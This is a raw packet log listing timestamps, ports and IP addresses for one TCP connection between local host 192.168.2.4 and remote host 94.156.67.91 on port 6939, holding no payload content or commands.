May 24, 2024 05:09:50.216749907 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.223351002 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.223561049 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.223702908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.223727942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.223934889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.224116087 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.224200010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.224210978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.224251986 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.226974964 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.226995945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.227044106 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.227194071 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.227205992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.227351904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.227381945 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.227596045 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.227718115 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.227885008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.227896929 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.227905989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.227938890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.228334904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.228389025 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.235352993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.235542059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.235615969 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.235728025 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.235903978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.236066103 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.236116886 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.236124992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.236171961 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.238193989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.238209009 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.238256931 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.238313913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.238325119 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.238367081 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.238554955 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.238873959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.238883018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.238892078 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.238923073 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.238956928 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.240119934 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.241825104 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.241875887 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.241960049 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.242177963 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.242188931 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.242201090 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.242333889 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.242333889 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.244885921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.244910955 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.244978905 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.269527912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.269541979 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.269783974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.269792080 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.269820929 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.269903898 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.270260096 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.270268917 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.270421028 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.274254084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.277641058 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.277700901 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.277833939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.277960062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.277970076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.277980089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.278124094 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.278124094 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.278559923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.278572083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.278582096 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.278594971 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.278619051 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.278655052 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.279185057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.279196978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.279207945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.279218912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.279230118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.279259920 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.279290915 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.280136108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.280621052 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.281069994 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.281080961 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.281090975 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.281127930 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.282069921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.282087088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.282140970 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.283392906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.283405066 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.283449888 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.284707069 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.284723997 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.284770012 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.286015987 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.286029100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.286040068 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.286068916 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.286098957 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.288199902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.288211107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.288254976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.289491892 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.289500952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.289652109 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.290344000 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.290357113 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.290366888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.290402889 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.291198015 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.291212082 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.291264057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.292048931 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.292061090 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.292071104 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.292107105 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.292141914 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.292907000 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.292920113 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.292929888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.292975903 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.293747902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.293759108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.293802023 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.294596910 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.294608116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.294617891 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.294652939 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.294683933 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.295461893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.295474052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.295485020 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.295514107 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.296272039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.296284914 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.296331882 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.297120094 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.297130108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.297173023 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.297976971 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.298091888 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.298383951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.298394918 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.298444986 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.298804045 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.299259901 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.299269915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.299305916 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.300079107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.300129890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.300508022 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.300942898 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.300952911 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.300996065 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.303008080 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.303064108 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.303215027 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.303653002 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.303702116 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.304091930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.304102898 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.304142952 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.307776928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.307786942 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.307831049 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.312298059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.312532902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.312691927 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.312915087 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.313378096 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.313388109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.313653946 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.314228058 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.314243078 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.314250946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.314295053 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.316360950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.316570044 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.316618919 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.316991091 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.317001104 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.317150116 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.317452908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.317461967 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.317503929 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.318268061 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.318952084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.319001913 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.324223995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.324420929 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.324480057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.324867964 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.325287104 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.325298071 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.325309038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.325442076 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.325443029 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.326132059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.327114105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.327316046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.327330112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.327379942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.327379942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.327754021 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.328200102 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.328210115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.328221083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.328248024 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.328284025 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.329044104 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.329430103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.329478979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.330713034 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.330898046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.330952883 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.331235886 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.331595898 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.331608057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.331641912 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.332256079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.332268953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.332304955 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.334152937 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.334213018 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.358561993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.358839989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.359157085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.359286070 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.359477043 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.359488010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.359496117 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.359786034 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.359786034 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.360320091 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.363461018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.363537073 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.366632938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.366878986 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.367117882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.367117882 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.367497921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.367507935 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.367660999 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.368359089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.368376970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.368387938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.368398905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.368421078 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.368468046 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.368927956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.368938923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.369009972 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.369556904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.369570017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.369616032 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.370249033 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.370261908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.370271921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.370305061 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.370337009 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.370964050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.370978117 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.371028900 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.371601105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.371612072 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.371654987 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.372291088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.372303009 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.372313023 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.372363091 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.372961998 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.372975111 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.373020887 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.373658895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.373670101 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.373708963 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.374361992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.374375105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.374382973 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.374417067 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.374448061 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.375005007 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.375015020 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.375056028 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.375688076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.375699043 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.375708103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.375737906 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.376368999 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.376380920 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.376420021 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.376723051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.376732111 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.376774073 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.377393007 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.377404928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.377446890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.378051043 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.378099918 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.378395081 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.378406048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.378453970 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.378756046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.378767014 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.378776073 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.378819942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.379412889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.379462004 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.379734993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.379745007 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.379755020 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.379781008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.381458044 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.381793022 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.382461071 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.382596970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.382647991 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.382863045 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.382877111 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.382927895 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.383194923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.383207083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.383218050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.383266926 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.386193037 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.386241913 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.386938095 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.387063980 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.387238979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.387316942 CEST	6939	49737	94.156.67.91	192.168.2.4
